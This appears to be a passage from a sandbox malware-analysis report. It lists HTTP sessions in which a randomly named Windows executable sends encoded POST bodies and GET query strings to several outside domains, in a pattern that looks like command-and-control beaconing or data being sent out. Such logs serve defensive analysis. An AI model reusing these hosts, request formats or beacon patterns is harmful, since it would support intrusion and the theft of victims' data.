                                                                                                                                                            Data Ascii: mnYxMt=3HzJ1oP0xOMJSrErSVE+hPYbBOggA8T8zQzS+oKBS/GhfEhMjaWO03o/HBaGJkpOVV5kyEHuxSQ3+QDsShiqZRy+NknoxZ09ObHTszv70fmcdaN0Gxal1b/+6/qh5JeWhj20njR3qKmi2uhcNpdFZI+/F1t1/PJKkJGxARIK0LL3P1Quf/c2f7fHKm984zPdI6+wPzyRYu+fFHvCj6Tb6YqOL298grYewLZl+sPiU6IAwXb/S4TL9kXefZ1Ipwyc2M0Tw/1zQsoffVhxzDQuGpTnTr9sVmJTHCDdwVVu7c6A3rAk7S1xenq3cpLTQdEmzvyjJsfF4MSx48ckA6864kqNkHllrdIFfbSz/8nheQna/RE8rWHF2ZoYgXKUux6URh5rsxpPKIEf/jMZc7TmwYuB9UD8vdwyVZNNyoUKC97s7KCvwrZxjNRFFWqDWa5U30gE8hOD53moOUNAWiQBg0ATQc9N9DLAQyvM9/Qcz2RUEFS26T3pbRNKSgQI7eUG2UG8yHKph24d00lxuYw9axAnpK//fYHaiBNgpSGM6aDEuOgEhKeTN080H48TcBuzMmSZxdc4IhbgpinSZzTglAH/ATs2yV8RbMnXv1U+X2bBrVEzQApECn8VzESSzNkEkw7QGinGP7sFASR1OQrQQjF2D1Tk+mCBs8AeQcM+iyC85QINxon6EoHIexhH32Va7QuHt+g7O/ISsJPFZ+1jrb+hYNNyoZpfsvRU96yZPRajjnKHncDOaQuMMb7j5h8F6pNqono7IZtK1GcFgMnCt65mCTNCduGncSBrAL4jQKG4tdRZJMmBWUwUrsjet9HXK++X/0vo+be5PBgiL+I3wNmDCYNsVcdKB927UHGtfHZmGAzO7effJ4MK8sWW16r1EMvHUUML4ro75nE+e+DlthRRCHgeiFSNa4HP3MCcRvfgPHmCxb6r5uJNspseZ4JxyqPKzEJXcCVnwSriI7meegmzlgZZTbn/VrQA7LnUkQ+PL [TRUNCATED]


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            28192.168.2.8500073.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:35:40.828793049 CET540OUTGET /xia9/?TTd=yRNPZBU8fZA&mnYxMt=6Fbp2c2euLl3IpV0Sl4p6qZBCOQHPcn3kT3/256CKoimaApAh5mhtnZkbQOyMHVCRwBLnE72oyxVmwPWVRK3JTmoB07JhO43d4HdqVa/yMKia/c5OjSLq43HtsiZpZ7nyQ== HTTP/1.1
                                                                                                                                                            Host: www.softillery.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Nov 12, 2024 18:35:41.456736088 CET410INHTTP/1.1 200 OK
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:41 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 270
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 54 54 64 3d 79 52 4e 50 5a 42 55 38 66 5a 41 26 6d 6e 59 78 4d 74 3d 36 46 62 70 32 63 32 65 75 4c 6c 33 49 70 56 30 53 6c 34 70 36 71 5a 42 43 4f 51 48 50 63 6e 33 6b 54 33 2f 32 35 36 43 4b 6f 69 6d 61 41 70 41 68 35 6d 68 74 6e 5a 6b 62 51 4f 79 4d 48 56 43 52 77 42 4c 6e 45 37 32 6f 79 78 56 6d 77 50 57 56 52 4b 33 4a 54 6d 6f 42 30 37 4a 68 4f 34 33 64 34 48 64 71 56 61 2f 79 4d 4b 69 61 2f 63 35 4f 6a 53 4c 71 34 33 48 74 73 69 5a 70 5a 37 6e 79 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?TTd=yRNPZBU8fZA&mnYxMt=6Fbp2c2euLl3IpV0Sl4p6qZBCOQHPcn3kT3/256CKoimaApAh5mhtnZkbQOyMHVCRwBLnE72oyxVmwPWVRK3JTmoB07JhO43d4HdqVa/yMKia/c5OjSLq43HtsiZpZ7nyQ=="}</script></head></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            29192.168.2.850008156.226.22.233806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:35:54.796467066 CET785OUTPOST /moqb/ HTTP/1.1
                                                                                                                                                            Host: www.nad5.shop
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.nad5.shop
                                                                                                                                                            Referer: http://www.nad5.shop/moqb/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 30 51 63 73 69 54 77 57 68 35 6b 59 67 49 66 46 52 58 30 6a 4a 48 48 6f 65 71 4e 48 45 6c 76 51 73 57 4d 6c 52 51 33 68 68 4f 79 36 33 5a 62 4e 38 38 31 53 4a 63 42 76 4f 4b 32 66 74 77 6f 44 58 51 79 4f 49 72 39 45 4c 61 30 34 64 6b 77 5a 4b 58 34 53 2f 6b 75 41 6a 52 31 73 38 49 68 74 37 34 36 56 31 6b 2f 4b 34 32 39 76 57 62 53 37 71 38 6e 53 4d 4c 79 54 77 42 57 68 53 77 77 4a 62 4c 78 70 43 65 73 79 5a 79 39 55 55 38 5a 53 71 4c 44 55 52 57 35 4a 69 65 50 62 59 2f 50 64 65 56 51 61 75 59 36 34 6d 36 53 4a 76 64 36 2b 63 67 48 58 4c 31 6c 57 70 34 63 49 4f 6b 31 52 7a 32 62 46 74 7a 73 3d
                                                                                                                                                            Data Ascii: mnYxMt=0QcsiTwWh5kYgIfFRX0jJHHoeqNHElvQsWMlRQ3hhOy63ZbN881SJcBvOK2ftwoDXQyOIr9ELa04dkwZKX4S/kuAjR1s8Iht746V1k/K429vWbS7q8nSMLyTwBWhSwwJbLxpCesyZy9UU8ZSqLDURW5JiePbY/PdeVQauY64m6SJvd6+cgHXL1lWp4cIOk1Rz2bFtzs=
                                                                                                                                                            Nov 12, 2024 18:35:55.638773918 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:55 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 548
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            30192.168.2.850009156.226.22.233806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:35:57.433465004 CET805OUTPOST /moqb/ HTTP/1.1
                                                                                                                                                            Host: www.nad5.shop
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.nad5.shop
                                                                                                                                                            Referer: http://www.nad5.shop/moqb/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 30 51 63 73 69 54 77 57 68 35 6b 59 68 70 76 46 58 32 30 6a 42 48 48 72 52 4b 4e 48 4f 46 76 55 73 57 77 6c 52 53 62 49 67 39 61 36 32 39 58 4e 39 39 31 53 4b 63 42 76 57 61 32 57 70 77 6f 4d 58 51 75 47 49 75 64 45 4c 61 77 34 64 68 4d 5a 4b 6d 34 64 74 6b 75 43 72 78 31 75 68 59 68 74 37 34 36 56 31 6b 71 58 34 79 52 76 57 4c 69 37 6f 64 6e 64 46 72 79 51 67 68 57 68 46 67 77 7a 62 4c 77 4d 43 62 45 49 5a 77 46 55 55 2b 78 53 74 61 44 58 62 57 35 50 74 2b 4f 55 5a 36 71 33 65 33 41 6d 69 36 7a 65 74 36 69 50 6e 4c 58 55 47 43 50 52 49 31 4e 39 70 37 30 2b 4c 54 6f 35 70 56 4c 31 7a 6b 36 39 75 77 31 75 37 35 2f 66 43 48 36 68 37 57 34 6b 72 76 39 6f
                                                                                                                                                            Data Ascii: mnYxMt=0QcsiTwWh5kYhpvFX20jBHHrRKNHOFvUsWwlRSbIg9a629XN991SKcBvWa2WpwoMXQuGIudELaw4dhMZKm4dtkuCrx1uhYht746V1kqX4yRvWLi7odndFryQghWhFgwzbLwMCbEIZwFUU+xStaDXbW5Pt+OUZ6q3e3Ami6zet6iPnLXUGCPRI1N9p70+LTo5pVL1zk69uw1u75/fCH6h7W4krv9o
                                                                                                                                                            Nov 12, 2024 18:35:58.310489893 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:58 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 548
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            31192.168.2.850010156.226.22.233806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:35:59.987641096 CET1822OUTPOST /moqb/ HTTP/1.1
                                                                                                                                                            Host: www.nad5.shop
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.nad5.shop
                                                                                                                                                            Referer: http://www.nad5.shop/moqb/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 30 51 63 73 69 54 77 57 68 35 6b 59 68 70 76 46 58 32 30 6a 42 48 48 72 52 4b 4e 48 4f 46 76 55 73 57 77 6c 52 53 62 49 67 39 43 36 32 4f 66 4e 38 65 4e 53 4c 63 42 76 49 4b 32 54 70 77 6f 72 58 51 6d 43 49 75 42 75 4c 59 34 34 48 45 41 5a 4d 56 67 64 33 30 75 43 6e 52 31 6a 38 49 68 43 37 35 57 52 31 6b 36 58 34 79 52 76 57 4e 75 37 68 73 6e 64 4a 4c 79 54 77 42 57 31 53 77 78 39 62 4b 55 36 43 62 41 59 65 41 6c 55 55 65 42 53 73 6f 72 58 54 57 35 4e 71 2b 50 4c 5a 36 75 73 65 33 63 71 69 37 47 37 74 35 79 50 32 61 32 72 63 67 2f 58 63 56 46 30 74 38 73 6b 4c 68 51 2f 75 56 37 41 35 54 54 54 75 6b 56 6e 2b 50 33 68 57 56 37 75 6d 77 34 33 37 36 55 59 5a 30 67 73 62 32 38 6a 49 47 5a 42 76 63 6e 59 31 4c 71 64 6a 6e 71 4d 79 57 4a 45 4d 54 70 56 46 4b 36 4a 41 52 6c 32 2f 44 6c 70 58 30 4a 38 49 74 6d 4f 4c 46 64 4c 4e 58 44 65 53 6e 35 59 2f 44 50 64 38 56 69 4e 31 37 75 4b 47 2b 6f 41 55 4c 74 78 2f 77 6a 47 2f 54 79 57 67 6d 76 51 35 6d 6a 45 78 43 46 37 6a 42 48 39 32 38 61 [TRUNCATED]
                                                                                                                                                            Data Ascii: mnYxMt=0QcsiTwWh5kYhpvFX20jBHHrRKNHOFvUsWwlRSbIg9C62OfN8eNSLcBvIK2TpworXQmCIuBuLY44HEAZMVgd30uCnR1j8IhC75WR1k6X4yRvWNu7hsndJLyTwBW1Swx9bKU6CbAYeAlUUeBSsorXTW5Nq+PLZ6use3cqi7G7t5yP2a2rcg/XcVF0t8skLhQ/uV7A5TTTukVn+P3hWV7umw4376UYZ0gsb28jIGZBvcnY1LqdjnqMyWJEMTpVFK6JARl2/DlpX0J8ItmOLFdLNXDeSn5Y/DPd8ViN17uKG+oAULtx/wjG/TyWgmvQ5mjExCF7jBH928apNKRBDn+huCduEXW+vIG9N1rNU8PS5VAiVDMYwmT9HHHh29iAVABhsALmtsMZ23lnHEdTGtwaT/ondjBzuBw7W7sCeN3YwZn4s6Gz3vgVZOYn7POq7vU+v4i5RORozizaqV94K34D2WSymbiT5W/BHw0q51eBrocWQDksu0Wcd9pzofZzBtNqNR+yQowW/UrjL/EAMyDZJsJuY7x0W6HjUFonEdtgHgMwmKRPRb8nuFI1a4YZpoEeGz6GxEckUdTdmpkjIBCPjuJ/x7PIJwiVitKnEbXFGzLaLo9s/pNVojnZ14Qot2dE25LFE147gvaazb1AqG6DwzaDmoM9txgJBP9gAOStqej/w97MU+Jc2JSyctYcfJncaIfIQ2b3sliMSxaRmkm24rOyLqEg0rvMMtB2DGWK8jDg3rwju5fX5bMBpuSKqFthhjmyPwB8xxnJF8IrLtZIUVzGoQ/0hbIj1KsLVj6ZcLlH0ZXnKTrIAofHPhI6ONby4lwZM0Su5HHtRKpT0VMUN6dhhcrdoM6CHVT7Jnv7a6OTqBdp+RROtOYKUtf6DdBwNytYYUfKqn97RG0H2I82IKZs2REYV/WqzatBLfwkojJn+UTnc/AZCGWfyRKoUbSneKQzwuHei+M7NVeh/szhJ1WSh6ngWKSJgIrsEQZpqfG5V [TRUNCATED]
                                                                                                                                                            Nov 12, 2024 18:36:00.935507059 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:00 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 548
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            32192.168.2.850011156.226.22.233806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:36:02.533385992 CET534OUTGET /moqb/?TTd=yRNPZBU8fZA&mnYxMt=5S0MhnNpk6MkkLalRnUZdzXeRbBtBDflj1oGaRHlrviJ69CM+vN0PvYaKZeKsDU+ZViOcrN8cLcNEkQHPUUQsQmQr2N8nNBPzMWj0VDcmFp5Ede8h+DqCqOrnQWhCDltJQ== HTTP/1.1
                                                                                                                                                            Host: www.nad5.shop
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Nov 12, 2024 18:36:03.491436958 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:03 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 548
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            33192.168.2.85001252.20.84.62806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:36:09.066406012 CET785OUTPOST /esft/ HTTP/1.1
                                                                                                                                                            Host: www.luxe.guru
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.luxe.guru
                                                                                                                                                            Referer: http://www.luxe.guru/esft/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 72 58 67 57 50 67 34 54 70 6e 61 7a 65 42 71 2b 33 52 2b 6d 48 6c 63 4c 37 56 59 47 50 52 74 54 71 79 2b 49 4b 7a 7a 36 31 32 71 45 4a 55 68 56 4a 49 4e 6e 6e 77 37 47 41 6c 70 4d 4d 62 54 31 59 75 54 59 42 68 42 77 39 68 72 49 6a 50 41 79 35 46 50 4a 2f 6e 53 6b 54 4d 6f 6a 63 5a 38 6e 4b 53 66 6e 59 68 63 35 69 42 74 36 6a 33 4f 69 61 6d 35 69 6f 47 75 51 2b 42 38 46 51 53 7a 45 2f 36 39 50 52 45 52 45 76 77 68 62 6a 6d 65 34 38 77 6a 4c 57 76 76 7a 32 52 6e 50 50 46 37 6e 37 6a 43 73 4d 62 59 50 6b 45 46 5a 43 4d 46 31 6c 6f 76 62 6e 38 37 68 2b 64 47 4b 53 2f 2b 6d 4c 58 4c 55 7a 4c 6f 3d
                                                                                                                                                            Data Ascii: mnYxMt=rXgWPg4TpnazeBq+3R+mHlcL7VYGPRtTqy+IKzz612qEJUhVJINnnw7GAlpMMbT1YuTYBhBw9hrIjPAy5FPJ/nSkTMojcZ8nKSfnYhc5iBt6j3Oiam5ioGuQ+B8FQSzE/69PREREvwhbjme48wjLWvvz2RnPPF7n7jCsMbYPkEFZCMF1lovbn87h+dGKS/+mLXLUzLo=
                                                                                                                                                            Nov 12, 2024 18:36:09.724383116 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:09 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 52139
                                                                                                                                                            Connection: close
                                                                                                                                                            ETag: "672f791b-cbab"
